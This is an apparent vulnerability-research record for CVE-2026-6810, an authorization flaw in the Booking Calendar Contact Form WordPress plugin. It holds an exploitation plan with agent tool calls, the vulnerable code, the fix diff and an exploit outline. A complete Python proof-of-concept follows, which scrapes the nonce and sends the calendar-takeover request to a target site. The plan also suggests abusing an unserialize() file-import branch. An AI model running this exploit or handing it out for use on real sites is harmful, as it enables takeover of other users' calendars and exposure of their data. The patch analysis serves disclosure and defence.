[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f3ICyD79fsYRi6_4fjlKctCh8ztHJSfdiDE69bdDMqes":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-6810","booking-calendar-contact-form-authenticated-subscriber-insecure-direct-object-reference-to-calendar-takeover","Booking Calendar Contact Form \u003C= 1.2.63 - Authenticated (Subscriber+) Insecure Direct Object Reference to Calendar Takeover","The Booking Calendar Contact Form plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.2.63 via the dex_bccf_admin_int_calendar_list.inc.php file due to missing validation on a user controlled key. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to take over other users' calendars and view user data associated with the calendar.","booking-calendar-contact-form",null,"\u003C=1.2.63","1.2.64","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Authorization Bypass Through User-Controlled Key","2026-04-23 16:30:20","2026-04-24 05:29:41",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa3977d10-239d-4b83-ab0c-ad165485498d?source=api-prod",1,[22,23,24],"README.txt","dex_bccf.php","dex_bccf_admin_int_calendar_list.inc.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-6810\n\n## 1. Vulnerability Summary\nThe **Booking Calendar Contact Form** plugin (\u003C= 1.2.63) is vulnerable to an **Insecure Direct Object Reference (IDOR)** in the administrative interface. The file `dex_bccf_admin_int_calendar_list.inc.php` processes calendar update requests without performing any capability checks (e.g., `current_user_can()`) and without comparing the requesting user to the calendar's current owner. It only verifies a WordPress nonce (`uname_bccf`). A nonce is a CSRF token, not an authorization control: any authenticated user who can load the plugin's admin page is handed a valid one. An authenticated attacker can therefore set the `conwer` (owner) column of any calendar ID to their own user ID, taking over calendars belonging to other users, including administrators. The `bccf_fileimport` and `ac=st` branches of the same file lack the check as well; the 1.2.64 fix gates all three behind `current_user_can('manage_options')`.\n\n## 2. 
Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin.php?page=dex_bccf.php`\n*   **Method:** `GET`\n*   **Vulnerable Parameters:**\n    *   `u`: The ID of the target calendar to take over (Insecure Direct Object Reference).\n    *   `owner`: The User ID to which ownership should be transferred (the attacker's ID).\n    *   `name`: The new name for the calendar.\n    *   `public`: Value written to the `caldeleted` field (typically `1`).\n*   **Authentication:** Required (Subscriber-level access or higher). Note that the CVSS vector recorded for this entry carries `PR:N` and `C:N`, which is inconsistent with the Subscriber-login precondition and with the data exposure the description claims; rescore before relying on the 5.3.\n*   **Preconditions:** The attacker must obtain a valid nonce for the `uname_bccf` action, which in turn requires that the plugin's admin page renders for their role.\n\n## 3. Code Flow\n1.  A user accesses `admin.php?page=dex_bccf.php`.\n2.  The plugin loads `dex_bccf.php`, which includes `dex_bccf_admin_int_calendar_list.inc.php`.\n3.  `dex_bccf_admin_int_calendar_list.inc.php` checks for `$_GET['u']` (Line 31).\n4.  It performs a nonce verification: `wp_verify_nonce( $_REQUEST['_wpnonce'], 'uname_bccf' )` (Line 33).\n5.  **Critically**, it performs no capability check and never compares `$current_user->ID` with the calendar's existing `conwer`.\n6.  It executes a prepared SQL statement (Lines 37-38):\n    ```php\n    $wpdb->query( $wpdb->prepare( \n        'UPDATE `'.DEX_BCCF_CONFIG_TABLE_NAME.'` SET conwer=%d,`'.TDE_BCCFCALDELETED_FIELD.'`=%d,`'.TDE_BCCFCONFIG_USER.'`=%s WHERE `'.TDE_BCCFCONFIG_ID.'`=%d', \n        sanitize_text_field($_GET[\"owner\"]), \n        sanitize_text_field($_GET[\"public\"]), \n        sanitize_text_field($_GET[\"name\"]), \n        $_GET['u'] \n    ) );\n    ```\n7.  `DEX_BCCF_CONFIG_TABLE_NAME` resolves to `{prefix}bccf_reservation_calendars`. The `%d` placeholders cast `owner`, `public` and `u` to integers, so this is an integer overwrite of another user's row, not an SQL injection.\n8.  `conwer` is the column storing the owner's User ID. By providing their own ID in `$_GET['owner']`, the attacker becomes the owner of calendar `$_GET['u']`.\n\n## 4. Nonce Acquisition Strategy\nThe nonce `uname_bccf` is required. It is generated within `dex_bccf_admin_int_calendar_list.inc.php` and embedded in the page source for administrative functions.\n\n1.  
**Identify Access:** Low-privilege users (Subscribers) can reach `admin.php?page=dex_bccf.php` only if the plugin registers its menu with a capability Subscribers hold (such as `read`) or fails to restrict the sub-include. Confirm this first: without the rendered page there is no nonce.\n2.  **Navigation:** Use `browser_navigate` to go to `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin.php?page=dex_bccf.php`.\n3.  **Extraction:** The nonce is stored in a PHP variable `$nonce_un` and used in JavaScript functions within the page.\n4.  **Execution:** Use `browser_eval` to find the nonce in the URL of the \"Update\" links or the `cp_updateItem` function logic.\n    *   The source shows the nonce is echoed directly into the `document.location` in the `cp_updateItem` JS function:\n        `'admin.php?page=dex_bccf.php&_wpnonce=\u003C?php echo $nonce_un; ?>&u='+id...`\n    *   Command: `browser_eval(\"document.documentElement.innerHTML.match(\u002F_wpnonce=([a-f0-9]{10})\u002F)[1]\")`\n\n## 5. Exploitation Strategy\n### Step 1: Discover Target Calendar ID\nAs an administrator, create a calendar. Note its ID (e.g., `1`).\n\n### Step 2: Authenticate as Subscriber\nLog in as a Subscriber-level user.\n\n### Step 3: Obtain Nonce\nNavigate to the plugin's admin page and extract the `uname_bccf` nonce.\n\n### Step 4: Execute Takeover Request\nPerform a GET request to `admin.php` with the attacker's own user ID as `owner`.\n\n*   **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin.php`\n*   **Query Parameters:**\n    *   `page`: `dex_bccf.php`\n    *   `u`: `1` (Target Calendar ID)\n    *   `owner`: `2` (Attacker Subscriber ID)\n    *   `name`: `Takeover`\n    *   `public`: `1`\n    *   `_wpnonce`: `[EXTRACTED_NONCE]`\n\n**Request Example (using `http_request`):**\n```json\n{\n  \"method\": \"GET\",\n  \"url\": \"http:\u002F\u002Fvulnerable-hostname\u002Fwp-admin\u002Fadmin.php?page=dex_bccf.php&u=1&owner=2&name=Takeover&public=1&_wpnonce=a1b2c3d4e5\"\n}\n```\n\n## 6. Test Data Setup\n1.  **Admin User:** Create an admin user.\n2.  
**Subscriber User:** Create a subscriber user (ID 2).\n3.  **Target Calendar:** As Admin, create at least one calendar.\n    *   `wp eval \"global \\$wpdb; \\$wpdb->insert(\\$wpdb->prefix . 'bccf_reservation_calendars', array('uname' => 'Admin Calendar', 'conwer' => 1, 'caldeleted' => 1));\"`\n4.  **Confirm ID:** Verify the calendar exists and is owned by ID 1 (the queries below assume the default `wp_` table prefix).\n    *   `wp db query \"SELECT id, uname, conwer FROM wp_bccf_reservation_calendars\"`\n\n## 7. Expected Results\n*   The server should return a `200 OK` response.\n*   The response body should contain the message: `\"Item updated\"` (quoted from line 39 of `dex_bccf_admin_int_calendar_list.inc.php`).\n*   The database record for the calendar with ID `u` will now have `conwer = 2`.\n*   Against a patched 1.2.64 install the same request yields neither `\"Item updated\"` nor `\"Access verification error\"`, because the new `current_user_can('manage_options')` guard skips the branch before the nonce is even checked. The absence of an error message is therefore not evidence of success; only the database check is.\n\n## 8. Verification Steps\n1.  **Database Check:**\n    ```bash\n    wp db query \"SELECT id, uname, conwer FROM wp_bccf_reservation_calendars WHERE id=1\"\n    ```\n    Confirm `conwer` is now the Subscriber's ID.\n2.  **UI Check:** Log in as the Subscriber. Navigate to `admin.php?page=dex_bccf.php`. The Subscriber should now see the \"Admin Calendar\" in their list, as the loop `if (cp_bccf_is_administrator() || ($current_user->ID == $item->conwer))` now evaluates to true for them.\n\n## 9. Alternative Approaches\nIf the `_wpnonce` extraction via `browser_eval` fails:\n*   Check for the nonce in the \"Export\" button or other links in the `Calendar List` table.\n*   If `admin.php?page=dex_bccf.php` is strictly blocked for Subscribers, check if the nonce can be obtained from the frontend if the plugin enqueues it there (less likely for this specific `uname_bccf` action).\n*   Check if the `bccf_fileimport` POST action (Line 14) can be abused using the same nonce to overwrite calendar data via `unserialize()`. That branch reads an uploaded file, `unserialize()`s its contents and feeds the resulting array straight into a `DELETE ... WHERE id=%d` and a `$wpdb->insert()` on the calendar table; in 1.2.63 it is guarded only by the same nonce, and the 1.2.64 diff adds `current_user_can('manage_options')` to it as well.","The Booking Calendar Contact Form plugin (\u003C= 1.2.63) lacks authorization checks in its administration interface, allowing Subscriber-level users to update calendar settings and change ownership. 
By supplying the 'u' and 'owner' parameters to \u002Fwp-admin\u002Fadmin.php?page=dex_bccf.php, which includes dex_bccf_admin_int_calendar_list.inc.php, an attacker can take over any calendar and access the user data associated with it.","\u002F\u002F dex_bccf_admin_int_calendar_list.inc.php line 14\nif (isset($_POST[\"bccf_fileimport\"]) && $_POST[\"bccf_fileimport\"] == 1 && wp_verify_nonce( $_POST['_wpnonce'], 'uname_bccf' ))\n{    \n    if (!wp_verify_nonce( $_REQUEST['_wpnonce'], 'uname_bccf' ))    \n        $message = \"Access verification error. Cannot update settings.\";\n    else\n    {   \n        $filename = sanitize_file_name($_FILES['cp_filename']['tmp_name']);\n        $handle = fopen($filename, \"r\");\n        $contents = fread($handle, filesize($filename));\n        fclose($handle);\n        $params = unserialize($contents);\n        $wpdb->query( $wpdb->prepare( 'DELETE FROM `'.DEX_BCCF_CONFIG_TABLE_NAME.'` WHERE id=%d', $params['id'] ) );    \n        unset($params[\"form_name\"]);\n        $wpdb->insert( DEX_BCCF_CONFIG_TABLE_NAME, $params);\n        @unlink($filename);\n        $message = \"Backup loaded.\";\n    }\n}\n\n---\n\n\u002F\u002F dex_bccf_admin_int_calendar_list.inc.php line 31\nelse if (isset($_GET['u']) && $_GET['u'] != '')\n{\n    if (!wp_verify_nonce( $_REQUEST['_wpnonce'], 'uname_bccf' ))    \n        $message = \"Access verification error. 
Cannot update settings.\";\n    else\n    {            \n        $wpdb->query( $wpdb->prepare( 'UPDATE `'.DEX_BCCF_CONFIG_TABLE_NAME.'` SET conwer=%d,`'.TDE_BCCFCALDELETED_FIELD.'`=%d,`'.TDE_BCCFCONFIG_USER.'`=%s WHERE `'.TDE_BCCFCONFIG_ID.'`=%d', sanitize_text_field($_GET[\"owner\"]), sanitize_text_field($_GET[\"public\"]), sanitize_text_field($_GET[\"name\"]), $_GET['u'] ) );           \n        $message = \"Item updated\";        \n    }    \n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbooking-calendar-contact-form\u002F1.2.63\u002Fdex_bccf_admin_int_calendar_list.inc.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbooking-calendar-contact-form\u002F1.2.64\u002Fdex_bccf_admin_int_calendar_list.inc.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbooking-calendar-contact-form\u002F1.2.63\u002Fdex_bccf_admin_int_calendar_list.inc.php\t2026-02-03 11:22:36.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbooking-calendar-contact-form\u002F1.2.64\u002Fdex_bccf_admin_int_calendar_list.inc.php\t2026-04-21 20:56:42.000000000 +0000\n@@ -11,7 +11,7 @@\n global $wpdb;\n $message = \"\";\n \n-if (isset($_POST[\"bccf_fileimport\"]) && $_POST[\"bccf_fileimport\"] == 1 && wp_verify_nonce( $_POST['_wpnonce'], 'uname_bccf' ))\n+if (current_user_can('manage_options') && isset($_POST[\"bccf_fileimport\"]) && $_POST[\"bccf_fileimport\"] == 1 && wp_verify_nonce( $_POST['_wpnonce'], 'uname_bccf' ))\n {    \n     if (!wp_verify_nonce( $_REQUEST['_wpnonce'], 'uname_bccf' ))    \n         $message = \"Access verification error. 
Cannot update settings.\";\n@@ -29,7 +29,7 @@\n         $message = \"Backup loaded.\";\n     }\n }\n-else if (isset($_GET['u']) && $_GET['u'] != '')\n+else if (current_user_can('manage_options') && isset($_GET['u']) && $_GET['u'] != '')\n {\n     if (!wp_verify_nonce( $_REQUEST['_wpnonce'], 'uname_bccf' ))    \n         $message = \"Access verification error. Cannot update settings.\";\n@@ -39,7 +39,7 @@\n         $message = \"Item updated\";        \n     }    \n }\n-else if (isset($_GET['ac']) && $_GET['ac'] == 'st')\n+else if (current_user_can('manage_options') && isset($_GET['ac']) && $_GET['ac'] == 'st')\n {\n     if (!wp_verify_nonce( $_REQUEST['_wpnonce'], 'uname_bccf' ))    \n         $message = \"Access verification error. Cannot update settings.\";","The exploit requires an authenticated session with Subscriber-level privileges or higher. \n\n1. The attacker navigates to the plugin's administration page (\u002Fwp-admin\u002Fadmin.php?page=dex_bccf.php) to obtain a valid WordPress nonce for the 'uname_bccf' action, which is embedded in the page's HTML\u002FJavaScript.\n2. The attacker identifies the numeric ID of a target calendar they wish to control.\n3. The attacker issues a GET request to the administrative endpoint with several specific parameters: 'page=dex_bccf.php', 'u' (the target calendar ID), 'owner' (the attacker's own user ID), '_wpnonce' (the extracted nonce), and 'public=1'.\n4. The plugin's back-end logic processes this request without checking if the current user has the 'manage_options' capability, executing a SQL UPDATE statement that assigns ownership of the calendar to the attacker's user ID.\n5. 
Once successful, the attacker can view and manage the calendar through the standard plugin interface.","gemini-3-flash-preview","2026-04-27 13:37:51","2026-04-27 13:38:19",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.2.63","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking-calendar-contact-form\u002Ftags\u002F1.2.63","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbooking-calendar-contact-form.1.2.63.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking-calendar-contact-form\u002Ftags\u002F1.2.64","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbooking-calendar-contact-form.1.2.64.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking-calendar-contact-form\u002Ftags"]
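The nonce extraction, request construction and result check described in the research plan and exploit outline above, as an added example in Python. This is not code from the plugin, from Wordfence or from the page's research plan. It assumes a lab install whose hostname, calendar ID, attacker user ID and logged-in Subscriber session cookie are supplied by the operator; the HTML sample is constructed to resemble the `cp_updateItem()` link the plan says the plugin emits, and the nonce value in it is made up. The response classifier keeps the three outcomes apart that a naive check would confuse: "Item updated" (1.2.63 takeover succeeded), "Access verification error" (bad nonce) and no message at all (1.2.64's `current_user_can('manage_options')` guard skipped the branch).

```python
"""Verification script for CVE-2026-6810 (added example, not the plugin's code).

Steps mirror the exploit outline:
  1. pull the `uname_bccf` nonce out of the plugin admin page,
  2. build the GET to admin.php with u/owner/name/public/_wpnonce,
  3. classify the response without mistaking silence for success.
"""
import re
import urllib.parse
import urllib.request
from typing import Optional

# WordPress nonces are 10 lowercase hex characters; same pattern as the plan's browser_eval.
NONCE_RE = re.compile(r"_wpnonce=([0-9a-f]{10})")

# Constructed sample, not captured from a real install. The research plan says
# $nonce_un is echoed into document.location inside cp_updateItem(); the nonce
# below is an assumed placeholder value.
SAMPLE_ADMIN_HTML = """
<script type="text/javascript">
function cp_updateItem(id) {
    document.location = 'admin.php?page=dex_bccf.php&_wpnonce=3f9a0c7b1e&u=' + id
        + '&name=' + encodeURIComponent(document.getElementById('n' + id).value);
}
</script>
<a href="admin.php?page=dex_bccf.php&amp;_wpnonce=3f9a0c7b1e&amp;ac=st">Export</a>
"""


def extract_nonce(html: str) -> Optional[str]:
    """Return the first uname_bccf nonce embedded in the admin page, or None."""
    m = NONCE_RE.search(html)
    return m.group(1) if m else None


def build_takeover_url(base_url: str, calendar_id: int, attacker_user_id: int,
                       nonce: str, name: str = "Takeover", public: int = 1) -> str:
    """Build the admin.php request that rewrites `conwer` for calendar `u`.

    wpdb::prepare() binds u, owner and public with %d, so anything non-numeric
    would silently become 0 server-side; int() here fails early instead.
    """
    query = urllib.parse.urlencode([
        ("page", "dex_bccf.php"),
        ("u", int(calendar_id)),
        ("owner", int(attacker_user_id)),
        ("name", name),
        ("public", int(public)),
        ("_wpnonce", nonce),
    ])
    return base_url.rstrip("/") + "/wp-admin/admin.php?" + query


def classify_response(body: str) -> str:
    """Map the response body to an outcome.

    1.2.63 prints "Item updated" on success and "Access verification error" on
    a bad nonce. 1.2.64 gates the branch with current_user_can('manage_options'),
    so a Subscriber gets neither string: "no_effect" must not be read as success.
    """
    if "Item updated" in body:
        return "updated"
    if "Access verification error" in body:
        return "nonce_rejected"
    return "no_effect"


def run_poc(base_url: str, session_cookie: str, calendar_id: int,
            attacker_user_id: int) -> str:
    """Live check against a lab install. `session_cookie` is the Cookie header
    of an already authenticated Subscriber session (assumed to be supplied)."""
    def get(url: str) -> str:
        req = urllib.request.Request(url, headers={"Cookie": session_cookie})
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.read().decode("utf-8", errors="replace")

    page = get(base_url.rstrip("/") + "/wp-admin/admin.php?page=dex_bccf.php")
    nonce = extract_nonce(page)
    if nonce is None:
        # Either the menu is not reachable for this role or the nonce is not embedded.
        return "no_nonce"
    return classify_response(get(build_takeover_url(base_url, calendar_id,
                                                    attacker_user_id, nonce)))


if __name__ == "__main__":
    import sys
    # usage: poc.py http://lab.test "wordpress_logged_in_<hash>=<value>" 1 2
    print(run_poc(sys.argv[1], sys.argv[2], int(sys.argv[3]), int(sys.argv[4])))
```

Whatever the classifier returns, confirm the takeover the way section 8 of the plan does, by reading `conwer` back from the database; the HTTP body alone cannot distinguish a patched install from one where the branch was never reached.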